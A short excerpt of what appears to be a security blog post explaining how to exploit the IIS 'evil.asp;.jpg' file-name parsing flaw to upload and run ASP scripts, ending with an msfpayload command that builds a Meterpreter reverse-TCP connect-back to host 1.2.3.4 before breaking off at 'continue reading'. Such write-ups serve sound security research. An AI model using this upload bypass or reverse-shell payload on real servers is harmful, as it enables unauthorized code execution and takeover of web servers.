Exploiting Microsoft IIS with Metasploit

As of this afternoon, the msfencode command has the ability to emit ASP scripts that execute Metasploit payloads. This can be used to exploit the currently-unpatched file name parsing bug feature in Microsoft IIS. This flaw allows a user who can upload a "safe" file extension (jpg, png, etc) to upload an ASP script and force it to execute on the web server. The bug occurs when a file name is specified in the form of "evil.asp;.jpg" -- the application checks the file extension and sees "jpg", but the IIS server will stop parsing at the first ";" and sees "asp". The result is trivial code execution on any IIS server that allows users to choose the file name of their uploaded attachment.For the following example, assume we have a web application that allows users to upload image files to the server. To complicate things, lets also assume that the application checks the file content to ensure that the uploaded file is a valid image. To exploit this, we need to generate an ASP script that drops a Meterpreter payload and configure a msfconsole instance to handle the session.First we generate an ASP script that does a Meterpreter connect-back to the system running Metasploit:$ msfpayload windows/meterpreter/reverse_tcp \ LHOST=1.2.3.4 LPORT=8443 R | \ msfencode (continue reading...)